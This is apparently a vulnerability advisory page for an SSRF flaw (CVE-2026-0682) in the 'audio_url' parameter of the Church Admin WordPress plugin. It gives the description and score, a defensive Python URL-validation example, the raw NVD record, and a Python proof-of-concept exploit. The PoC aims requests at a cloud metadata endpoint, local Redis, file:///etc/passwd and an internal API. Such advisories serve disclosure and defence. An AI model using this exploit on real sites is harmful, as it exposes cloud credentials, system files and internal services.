Security Vulnerability Report
CVE-2026-0682 CVSS 2.2 LOW

CVE-2026-0682

Published: 2026-01-17 04:16:08
Last Modified: 2026-04-15 00:35:42

Description

The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
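The description attributes the issue to insufficient validation of the user-supplied 'audio_url' URL before the server fetches it (the NVD record classifies it as CWE-918). The following is an added example, not code from the Church Admin plugin, of what such a check looks like on the server side: allow only http/https, refuse embedded credentials, resolve the host, and reject any address that is loopback, private, link-local (including the 169.254.169.254 cloud metadata range that the PoC further down this page targets) or otherwise non-public, including IPv4-mapped IPv6 wrappers of those ranges. The resolver is injectable so the check can be exercised offline; `default_resolver`, `validate_outbound_url` and the hostnames used in the notes are assumptions of this example, not names from the plugin.

```python
# Added example (not the Church Admin plugin's code): the kind of outbound-URL
# check the advisory says was missing for the 'audio_url' parameter.
# Hostnames are resolved through an injectable resolver so the check can run
# offline; production code passes the real socket-based resolver.
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Resolve a hostname to every address it maps to (IPv4 and IPv6)."""
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def is_public_address(addr_text):
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918 / ULA, link-local (which covers the
    169.254.169.254 metadata address), multicast, unspecified and reserved
    ranges, and unwraps IPv4-mapped IPv6 addresses so ::ffff:127.0.0.1 is
    judged as 127.0.0.1.
    """
    addr = ipaddress.ip_address(addr_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def validate_outbound_url(url, resolver=default_resolver):
    """Return (ok, reason).

    ok is True only when the scheme is http/https, the URL carries no
    credentials, and every address the host resolves to is public.
    """
    try:
        parts = urlparse(url)
        host = parts.hostname
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"

    # A literal IP address never touches DNS; check it directly.
    try:
        ipaddress.ip_address(host)
        addresses = [host]
    except ValueError:
        try:
            addresses = resolver(host)
        except (OSError, LookupError) as exc:
            return False, f"could not resolve {host!r}: {exc}"
        if not addresses:
            return False, f"no addresses for {host!r}"

    # Every resolved address must be public; one internal A/AAAA record is
    # enough to reject the URL.
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    return True, "ok"
```

Two caveats apply when a check like this is wired into a fetch path. First, the address that passed the check must be the one the client actually connects to; a DNS record that changes between the check and the connection, or an HTTP redirect from the fetched URL to an internal address, otherwise bypasses the filter, so the fetch should reuse the validated address or re-run the check on every redirect hop. Second, a deny-list of address ranges is weaker than an allow-list of the media hosts the application expects, where the deployment can express one.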

CVSS Details

CVSS Score: 2.2
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Church Admin plugin for WordPress <= 5.0.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0682 SSRF PoC - Church Admin Plugin for WordPress
# Requires Administrator privileges
import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"

# Authentication cookie with admin privileges required
COOKIES = {
    "wordpress_test_cookie": "WP+Cookie+check",
    "wordpress_logged_in_user": "admin_session_token"
}


def test_ssrf(url):
    """Test if SSRF vulnerability exists"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    # Malicious audio_url to test SSRF
    # (the action name and nonce below are placeholders; the advisory does not
    # confirm the AJAX action or how the nonce is obtained)
    data = {
        "action": "church_admin_save_sermon",
        "audio_url": url,
        "nonce": "attacker_obtained_nonce"
    }
    try:
        response = requests.post(endpoint, data=data, cookies=COOKIES, timeout=10)
        return response.text
    except Exception as e:
        return f"Request failed: {str(e)}"


def main():
    # Declare the module-level name so the assignment below updates it
    # instead of creating an unused local variable
    global TARGET_URL
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-0682-poc.py <target_url>")
        sys.exit(1)
    TARGET_URL = sys.argv[1]
    # Test cases for SSRF exploitation
    test_urls = [
        # AWS metadata endpoint
        "http://169.254.169.254/latest/meta-data/",
        # Internal service
        "http://localhost:6379/info",
        # File access
        "file:///etc/passwd",
        # Internal API
        "http://internal-admin.local/api/config"
    ]
    print(f"[*] Testing CVE-2026-0682 SSRF on {TARGET_URL}")
    for test_url in test_urls:
        print(f"\n[*] Testing: {test_url}")
        result = test_ssrf(test_url)
        print(f"[+] Response: {result[:200]}...")


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/functions.php#L6297
https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/sermon-podcast.php#L1181
https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/functions.php#L6297
https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/sermon-podcast.php#L1181
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440847%40church-admin&new=3440847%40church-admin&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=cve
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0682", "sourceIdentifier": "[email protected]", "published": "2026-01-17T04:16:07.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Church Admin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.0.28 due to insufficient validation of user-supplied URLs in the 'audio_url' parameter. This makes it possible for authenticated attackers, with Administrator-level access, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}, {"lang": "es", "value": "El plugin Church Admin para WordPress es vulnerable a la falsificación de petición del lado del servidor en todas las versiones hasta la 5.0.28, inclusive, debido a la validación insuficiente de las URL proporcionadas por el usuario en el parámetro 'audio_url'. Esto permite a atacantes autenticados, con acceso de nivel de Administrador, realizar peticiones web a ubicaciones arbitrarias originadas desde la aplicación web y puede usarse para consultar y modificar información de servicios internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/functions.php#L6297", "source": "[email protected]"}, 
{"url": "https://plugins.trac.wordpress.org/browser/church-admin/tags/5.0.27/includes/sermon-podcast.php#L1181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/functions.php#L6297", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/church-admin/trunk/includes/sermon-podcast.php#L1181", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440847%40church-admin&new=3440847%40church-admin&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77227fc5-7c38-476d-af4c-4b2ad3dd8420?source=cve", "source": "[email protected]"}]}}